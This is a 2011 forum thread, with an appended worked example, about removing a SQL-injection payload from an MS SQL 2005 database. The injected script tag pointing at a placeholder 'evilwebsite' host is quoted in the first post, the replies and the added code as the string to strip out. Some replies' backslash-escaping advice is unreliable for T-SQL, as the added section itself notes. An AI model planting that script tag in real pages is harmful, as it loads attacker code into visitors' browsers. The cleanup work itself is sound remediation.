Armed Polite Society

Main Forums => The Roundtable => Topic started by: 41magsnub on December 14, 2011, 08:13:27 PM

Title: sql geniuses
Post by: 41magsnub on December 14, 2011, 08:13:27 PM
Disclaimer:  I do not manage SQL server for this customer and I know this is bad..  this is to fix the end result of a sql injection attack.  New customer, getting paid to fix and will make recommendations afterwards.  It is in MS SQL 2005

Their backups suck.  They are already working with some web devs to fix the code on their site so this can't happen in the future and I have revamped the backup scheme to something that actually, you know...  backs up somewhere.

There was a sql injection attack, the string:  "></title><script src="http://evilwebsite/file.php"></script><!--  was inserted just before the real data in gobs of fields in multiple tables.  Note the odd number of "'s

I am trying to write a sql replace query to wipe out the evil string with nothing to repair the DB.  It is not ideal but it is what we've got.  However, the jackasses who did the attack are smarter than me in SQL and stuck a " in the string so my commands fail due to the unclosed quotes.  Can one of you geniuses show me how to write a query that will do what I need with the screwy quotes?

I have the infected table up on another server right now to test on.
Title: Re: sql geniuses
Post by: GigaBuist on December 14, 2011, 09:00:12 PM
Code:
UPDATE tblData
SET txtField = REPLACE(txtField, '"></title><script src="http://evilwebsite/file.php"></script><!--', '');
If you start with single quotes I don't think the double quotes will cause you any trouble.  If they do escape them with a backslash (\):
Code:
UPDATE tblData
SET txtField = REPLACE(txtField, '\"></title><script src=\"http://evilwebsite/file.php\"></script><!--', '');

Edited post to stick SQL into code blocks.  Should make it easier to tell when I use apostrophe, double quotes, and two apostrophes together.
Title: Re: sql geniuses
Post by: 41magsnub on December 14, 2011, 09:32:41 PM
thanks!  I'll give that a whack.
Title: Re: sql geniuses
Post by: 41magsnub on December 14, 2011, 09:53:46 PM
moot point, the data is pretty static and they are going to roll back to the one backup I found from a couple of months ago.  I'll play with this tomorrow though.

Thanks again!
Title: Re: sql geniuses
Post by: CNYCacher on December 14, 2011, 11:52:11 PM
You were getting tripped up because you were using double quotes around the thing you were searching for.

Let's say that this is the malicious code:
foo"bar

You were trying to match it like this: "foo"bar"
Which was obviously breaking

Get around it by doing this instead: 'foo"bar'
Or this: "foo\"bar"

This will not work: 'foo\"bar'
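As an added example that is not part of the thread (the table and column names tblData/txtField are taken from GigaBuist's reply; the rows are constructed), here is a T-SQL rehearsal of the cleanup on a temp table, the way one would test it on the copied table mentioned in the first post before touching production. Two facts about MS SQL matter for the quoting problem discussed above: inside a single-quoted T-SQL literal a double quote needs no escaping at all, a single quote is written as two single quotes (''), and backslash is not an escape character in T-SQL. Because the first post says the script tag was inserted just before the real data, the update strips only a leading match rather than every occurrence, and the whole thing runs inside a transaction that rolls back if any payload survives.

```sql
-- Added example, not code from the thread. Exercises the cleanup on constructed
-- rows in a temp table; tblData/txtField are the names used in the thread.
CREATE TABLE #tblData (id int IDENTITY(1,1), txtField nvarchar(400));

-- The injected prefix, held in a single-quoted variable. The embedded double
-- quotes need no escaping; only a single quote would, as two single quotes.
-- (SET on a separate line: inline DECLARE initialisers arrived in SQL 2008.)
DECLARE @payload nvarchar(200);
SET @payload = N'"></title><script src="http://evilwebsite/file.php"></script><!--';

-- Constructed sample rows: two infected, one clean, one that legitimately
-- contains script-like text and must not be altered.
INSERT INTO #tblData (txtField) VALUES (@payload + N'Acme Widgets');
INSERT INTO #tblData (txtField) VALUES (N'Clean row');
INSERT INTO #tblData (txtField) VALUES (@payload + N'O''Brien & Sons');
INSERT INTO #tblData (txtField) VALUES (N'mentions <script src="x"> in real content');

-- 1. Scope the damage before changing anything.
SELECT COUNT(*) AS infected_rows
FROM #tblData
WHERE LEFT(txtField, LEN(@payload)) = @payload;

-- 2. Strip the payload, but only where it is the leading prefix, since that is
--    where the attack put it. DATALENGTH is deliberately oversized (bytes, not
--    characters) so trailing spaces in the real data are not lost.
BEGIN TRANSACTION;

UPDATE #tblData
SET txtField = SUBSTRING(txtField, LEN(@payload) + 1, DATALENGTH(txtField))
WHERE LEFT(txtField, LEN(@payload)) = @payload;

-- 3. Inspect, then commit only if nothing infected remains.
SELECT id, txtField FROM #tblData ORDER BY id;

IF EXISTS (SELECT 1 FROM #tblData WHERE txtField LIKE N'%' + @payload + N'%')
    ROLLBACK TRANSACTION;
ELSE
    COMMIT TRANSACTION;

DROP TABLE #tblData;
```

The prefix-only match (LEFT(...) = @payload) is the conservative choice when the injection point is known: a blanket REPLACE over every field would also rewrite any row where a similar fragment is genuine content, and after a restore from a months-old backup that is exactly the kind of silent change nobody notices. The final IF/ELSE is what keeps the rehearsal honest: if the payload shows up anywhere other than as a leading prefix, the transaction rolls back and the query can be widened deliberately instead of by accident.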